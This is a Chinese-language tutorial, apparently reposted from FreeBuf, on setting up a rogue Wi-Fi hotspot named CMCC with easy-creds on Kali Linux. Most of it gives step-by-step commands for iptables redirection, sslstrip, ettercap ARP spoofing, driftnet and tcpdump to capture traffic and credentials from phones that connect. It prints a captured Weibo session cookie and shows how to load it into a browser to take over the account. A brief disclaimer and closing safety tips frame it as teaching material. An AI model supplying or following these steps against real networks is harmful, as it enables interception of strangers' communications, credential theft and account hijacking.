文中提及的部分技術可能帶有一定攻擊性,僅供安全學習和教學用途,禁止非法使用!
0×00 實驗環境
操作系統:Kali 1.0 (VM)
FackAP: easy-creds
硬件:NETGEAR wg111 v3 RTL8187B 網卡(kali下免驅)
靶機:安卓、iPhone設備
0×01 環境搭建
git clone https://github.com/brav0hax/easy-creds cd easy-creds
bash install.sh
選擇第一項:1. Debian/Ubuntu and derivatives
這一步設定easy-creds的安裝目錄:/opt ,安裝過程中會從國外網站下載一些依賴包以及第三方軟件,這一過程中建議通過翻牆來節省時間。
當看到提示happy hunting的時候便意味着安裝完成了:
0×02
根據上述步驟已將easy-creds安裝到Kali中,我們可以在終端執行easy-creds運行,接下來我們需要對軟件、系統參數進行一些修改:
2.1 修改etter uid、gid值 &開啟iptables端口轉發
kali中自帶了中間人攻擊的一些工具,如:ettercap,在第一次使用ettercap時,我們需要修改其默認配置文件/etc/ettercap/etter.conf: (有的系統中,ettercap的配置文件路徑為:/etc/etter.conf)
需要我們把ettercap的ec_uid、ec_gid的值修改為0:以系統最高權限運行。
另外,如果系統使用了iptables防火牆,還需取消#后的注釋使iptables配置生效,將:
# if you use iptables: #redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" #redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
修改為:
# if you use iptables: redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport" redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
2.2 開啟ipv4數據包轉發:
echo 1 >> /proc/sys/net/ipv4/ip_forward
2.3 配置iptables規則:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
2.4 運行sslstrip
sslstrip -l 8080
2.5 開啟網絡管理 &重啟網絡管理服務
vim /etc/NetworkManager/NetworkManager.conf
將managed=false修改為managed=true:
重啟網絡管理服務:
service network-manager restart
0×03 運行easy-creds
終端執行:easy-creds
選擇第三項:FakeAP Attacks
選擇第一項:FakeAP Attack Static
y確定包含sidejacking劫持攻擊:
下一步選擇WIFI網絡的流量入口:eth0
選擇無線網絡接口&設備:wlan0
設定WIFI-SSID:CMCC
WIFI網絡信道:5
mon0
n
at0
n
為無線網絡設置網段:192.168.88.0/24
設定DNS服務器:8.8.8.8
完成之后,easy-creds啟動了Airbase-NG、DMESG、SSLStrip、Ettercap tunnel、URL snarf、Dsniff等工具:
紅色部分顯示安卓、iPhone靶機成功連入釣魚WIFI環境,URL snarf也捕獲到了兩台設備正在訪問的網站網址等信息。
0×04 Hacking for fun
4.1 “綿羊牆”
driftnet是一款簡單而使用的圖片捕獲工具,能夠捕獲到網絡數據包中的圖片,同時支持抓取和顯示音頻文件,可用於捕獲微信朋友圈中的相片、微博配圖等等。
driftnet -i at0 (-i指定監聽的網絡接口)
4.2 MITM中間人攻擊
Ettercap利用ARP欺騙,監聽同一網段內某台主機甚至所有主機的網絡通信流量,抓取其它主機通信流量中的Cookie等信息:
ettercap -i at0 -T -M arp:remote /192.168.88.1/ // (通過ARP欺騙,監聽192.168.88.0/24 網段所有主機通信流量)
4.3 利用Cookie登陸受害者賬戶
利用Cookie前,我們需要下載瀏覽器的一些Cookie相關的插件,如cookie manager、cookie editor。
這里我使用了:Modify Headers for Google Chrome
4.3.1 捕獲到的微博Cookie數據:
Wed Jul 20 11:27:50 2016 TCP 192.168.88.100:50664 --> 180.149.139.248:80 | AP GET /unread?t=1468985586846 HTTP/1.1. Host: m.weibo.cn. Connection: keep-alive. User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_2 like Mac OS X; zh-CN) AppleWebKit/537.51.1 (KHTML, like Gecko) Mobile/13F69 UCBrowser/10.9.19.815 Mobile. Cookie: H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U. Accept: application/json, text/javascript, */*; q=0.01. X-Requested-With: XMLHttpRequest. Accept-Language: zh-cn. Referer: http://m.weibo.cn/. Accept-Encoding: gzip,deflate. .
4.3.2 清空瀏覽器內weibo.cn的Cookie:
4.3.3 導入微博Cookie
選擇右上角+ 增加Cookie:
Action=Modify
Name=Cookie
Value=H5_INDEX=3; H5_INDEX_TITLE=0xroot; SUB=_2A256ilXJDeTxGeVK7VAY8y3KyjiIHXVWdXuBrDV6PUJbkdBeLRb1kW2Qqy_JChRgGgUi-REU1X25o5jdzQ..; SUHB=0y0p0SAr00Gj3K; _T_WM=132ca5c49dea82a69fb16ebcdaae493a; gsid_CTandWM=4um4CpOz5VMlYWGOqKlx8ewRL9U.
4.3.4 訪問m.weibo.cn:
0×05 嗅探數據包&協議分析
5.1 wireshark
5.2 tcpdump
tcpdump -i at0 -w sniffe.dump
5.3 ssltrips嗅探https加密流量
捕獲HTTPS通信傳輸中的賬號、密碼:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
ssltrips -p -l 8080 -w log.txt
0×06 注意事項
1.easy-creds生成的日志文件過大,建議在/tmp目錄中啟動easy-creds(即使忘了刪easy-creds日志,系統重啟后自動清空/tmp目錄)
2.如果連入釣魚熱點的設備不能聯網了及時檢查:/proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
當發現值為0的時候需再次執行:
echo 1 >> /proc/sys/net/ipv4/ip_forward
3.easy-creds目前不兼容kali 2.0,所以不建議在kali 2.0 系統中安裝easy-creds;
4.目前測試easy-creds只支持移動設備接入WIFI,測試過程中發現筆記本(win 7)接入WIFI不能聯網。
0×07 安全建議
1.不隨便連陌生 WIFI,及時注銷登錄狀態可使Cookie時效;
2.不使用WIFI時及時關閉手機WIFI,避免自動連入諸如CMCC這一類的公共開放無線熱點。
0×08 refer
Ettercap Man In The MIddle Attack + SSL Strip
原文地址:http://www.freebuf.com/articles/wireless/108830.html